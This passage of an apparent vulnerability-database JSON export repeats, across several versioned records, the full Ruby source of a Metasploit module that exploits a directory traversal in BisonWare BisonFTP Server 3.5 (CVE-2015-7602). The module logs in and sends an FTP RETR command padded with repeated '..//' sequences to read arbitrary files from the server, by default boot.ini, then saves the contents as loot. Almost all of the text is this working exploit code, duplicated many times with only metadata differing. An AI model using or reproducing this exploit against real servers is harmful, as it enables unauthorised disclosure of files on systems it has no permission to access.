\"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-20T10:30:37", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-20T22:29:59", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-04-08T00:12:12", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-20T22:29:59", "differentElements": ["modified", "published"], "edition": 20}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-21T00:30:18", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-21T00:30:18", "differentElements": ["modified", "published"], "edition": 21}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-25T12:40:34", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-25T12:40:34", "differentElements": ["modified", "published"], "edition": 22}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-25T14:41:36", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-25T14:41:36", "differentElements": ["modified", "published"], "edition": 23}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-28T10:45:06", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-28T10:45:06", "differentElements": ["modified", "published"], "edition": 24}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-28T14:42:14", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-28T14:42:14", "differentElements": ["modified", "published"], "edition": 25}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-05-09T17:03:32", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
